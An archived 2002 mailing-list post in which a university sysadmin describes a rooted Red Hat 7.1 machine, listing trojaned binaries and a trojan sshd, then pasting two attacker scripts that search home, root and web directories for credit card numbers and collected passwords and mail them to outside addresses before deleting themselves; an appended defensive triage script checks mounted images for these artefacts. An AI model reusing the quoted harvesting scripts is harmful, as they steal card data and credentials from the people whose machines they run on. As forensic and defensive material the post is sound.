questions about a rooted RH7.1 box

From: Christopher Albert (sysadminat_private)
Date: Fri Apr 12 2002 - 14:02:52 PDT


    Greetings,
    One of the students here got his home box rooted last week. Before he
    reinstalled I asked him to let me have a look at his box, which I could
    only do remotely. I took a look at it yesterday for about twenty minutes
    and collected some stuff, but I had him pull it offline before
    grave-robber and I were finished because the box seemed just too poisoned
    and I wasn't comfortable staying connected. I have some questions about
    what I found, and was wondering if the tools I found were from a familiar
    rootkit.
    
    1. Most of the attack tools were in
    
    /usr/lib/.lib :      libdi  libdu  libfh  libne  libnh  libvd
    libdi = libvd  # The 'ls' trojan
    libdu =            # The 'top' trojan
    libne =            # The 'netstat' trojan
    
    The 'ps' trojan was in : /usr/lib/libc/libp
     
    /usr/lib/sn :        *  .sys  .X
    /usr/lib/ld :         *  chat  .cv  .X
           
    .X =         # Sorts the output from LinSniffer 0.03 [BETA] by Mike Edulla
                 <medullaat_private>; .sys was its output file.
    
    'chat' seemed to be 'chattr', which was removed from the system.
    
    .cv was the output of a script in /usr/man/.../ looking for credit card
    numbers.
    /usr/man/.../: .c .m    # I'll paste these scripts at the end, since they
    are revealing.
    
    In addition, /usr/bin/kernel seemed to be a trojan sshd, running on
    ports 6010, 6011.
    
    The scripts .c and .m are:
    /usr/man/...
    .c
    #!/bin/bash
    hh="r0otat_private"
    egrep -ir 'mastercard|visa' /home|egrep -v cache >> /usr/lib/ld/.cv
    egrep -ir 'mastercard|visa' /var|egrep -v cache >> /usr/lib/ld/.cv
    egrep -ir 'mastercard|visa' /root|egrep -v cache >> /usr/lib/ld/.cv
    if [ -d "/www" ]; then
    egrep -ir 'mastercard|visa' /www >> /usr/lib/ld/.cv
    fi
    if [ -d "/var/www" ]; then
    egrep -ir 'mastercard|visa' /var/www >> /usr/lib/ld/.cv
    fi
    if [ -f "/usr/lib/ld/.cv" ]; then
    /sbin/ifconfig | grep inet | awk '{print $2}'| cut -d: -f2 | grep -v 
    "127.0.0." | grep -v "192.168.0." >> /usr/lib/ld/.cv
    hostname -f >> /usr/lib/ld/.cv
    cat /usr/lib/ld/.cv | mail -s "cronmonthly" $hh
    rm &> /dev/null -rf /usr/lib/ld/.cv
    fi
    rm &> /dev/null -rf /usr/man/.../.c
    
    .m
    #!/bin/bash
    #/usr/man/.../.m
    #
    cs="blackeyeroat_private"
    dp="/usr/lib/ld"
    db="/usr/share/rht/..."
    wd="/usr/man/.../.w
    ml="/usr/man/.../.m
    if [ -f "$dp/.i" ]; then
    cat $dp/.i >> $dp/.pw
    fi
    if [ -f "$bla2/.o" ]; then
    cat $dp/.o >> $dp/.pw
    fi
    /sbin/ifconfig | grep inet | awk '{print $2}'| cut -d: -f2 | grep -v 
    "127.0.0." | grep -v "192.168.0." >> $dp/.d
    hostname -f >> $dp/.d
    cat $dp/.pw >> $dp/.d
    if [ -f "/etc/hosts" ]; then
    cat /etc/hosts >> $dp/.d
    fi
    cat $dp/.d | mail -s "cronstate" $cs
    cat $dp/.pw >> $db/.p
    rm &> /dev/null -rf $dp/.pw $dp/.d $wd $ml
    
    Thought this might be of interest to the group.
    
    Chris
    
    -- 
    --------------------------------------------------------------------
                         Christopher Albert            
                Responsable des services informatiques
             Departement de mathematiques et de statistique
                      Universite de Montreal                       
    
               bureau 6188, Pavillon Andre-Aisenstadt
              Tel: (514) 343-2281  Fax: (514) 343-5700  
    --------------------------------------------------------------------
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
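A defender who wants to check another machine for the same artefacts can test the paths Chris lists, plus the two strings his pasted scripts share (the card-number grep and the "cron..." mail subject used to exfiltrate results), against a mounted copy of the disk. The script below is an added example written for this archive page; it is not part of Chris's post and not code from any rootkit. It assumes the evidence filesystem (or a dd image of it) is mounted read-only at the directory given as its only argument, and the small sample tree it builds when run without an argument is constructed here purely for demonstration. It also goes slightly beyond the post by flagging every hidden directory under usr/, not only the ones listed.

```shell
#!/bin/sh
# Added example, not part of the original post: offline triage of a mounted
# copy of a compromised filesystem for the artefacts listed in the message.
# Assumption: the evidence filesystem is mounted read-only at the directory
# passed as $1; nothing here reads the analysis host's own /usr.

# Paths named in the post, relative to the mount root.
IOC_PATHS="usr/lib/.lib usr/lib/.lib/libdi usr/lib/.lib/libdu usr/lib/.lib/libfh
usr/lib/.lib/libne usr/lib/.lib/libnh usr/lib/.lib/libvd usr/lib/libc/libp
usr/lib/sn usr/lib/sn/.sys usr/lib/sn/.X
usr/lib/ld usr/lib/ld/chat usr/lib/ld/.cv usr/lib/ld/.X
usr/man/... usr/man/.../.c usr/man/.../.m usr/share/rht/... usr/bin/kernel"

# Print each listed path that exists under the mount root, one per line.
triage_paths() {
    root=$1
    for p in $IOC_PATHS; do
        [ -e "$root/$p" ] && printf '%s\n' "$p"
    done
    return 0
}

# Hidden directories under usr/ (names starting with '.', which also matches
# the '...' directories the scripts hide in). Legitimate ones are rare there,
# so each hit deserves a look even when it is not in the list above.
triage_hidden_dirs() {
    root=$1
    find "$root/usr" -type d -name '.*' 2>/dev/null | sed "s|^$root/||" | sort
}

# Files whose contents carry the two signatures shared by the harvesting
# scripts: the card-number grep and the "cron..." mail subject (fixed strings).
triage_script_strings() {
    root=$1
    grep -rlF -e "mastercard|visa" -e 'mail -s "cron' "$root" 2>/dev/null \
        | sed "s|^$root/||" | sort
}

# Constructed sample tree so the checks can be exercised offline. File
# contents are placeholders; only the paths and the two strings come from
# the post.
make_sample_image() {
    root=$1
    mkdir -p "$root/usr/man/..." "$root/usr/lib/ld" "$root/usr/lib/.lib" "$root/usr/bin"
    cat > "$root/usr/man/.../.c" <<'EOF'
#!/bin/bash
egrep -ir 'mastercard|visa' /home | egrep -v cache >> /usr/lib/ld/.cv
cat /usr/lib/ld/.cv | mail -s "cronmonthly" $hh
EOF
    : > "$root/usr/lib/ld/.cv"
    : > "$root/usr/lib/.lib/libdi"
    : > "$root/usr/bin/kernel"
}

# Usage: sh triage.sh /mnt/evidence   (no argument: run against the sample tree)
if [ "$#" -eq 1 ]; then
    root=$1
else
    root=$(mktemp -d)
    make_sample_image "$root"
fi
echo "== listed paths present under $root";        triage_paths "$root"
echo "== hidden directories under usr/";           triage_hidden_dirs "$root"
echo "== files carrying the harvesting-script strings"; triage_script_strings "$root"
```

The path list is deliberately exact rather than clever: a rootkit that is installed by a script tends to land in the same places every time, so a plain existence check over a mounted image is cheap and reliable, while the hidden-directory and string sweeps catch a variant that moved. Run it against a copy; the trojaned ls, ps and netstat described above mean the live box's own tools cannot be trusted to report these files.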
    



    This archive was generated by hypermail 2b30 : Sun Apr 14 2002 - 14:50:29 PDT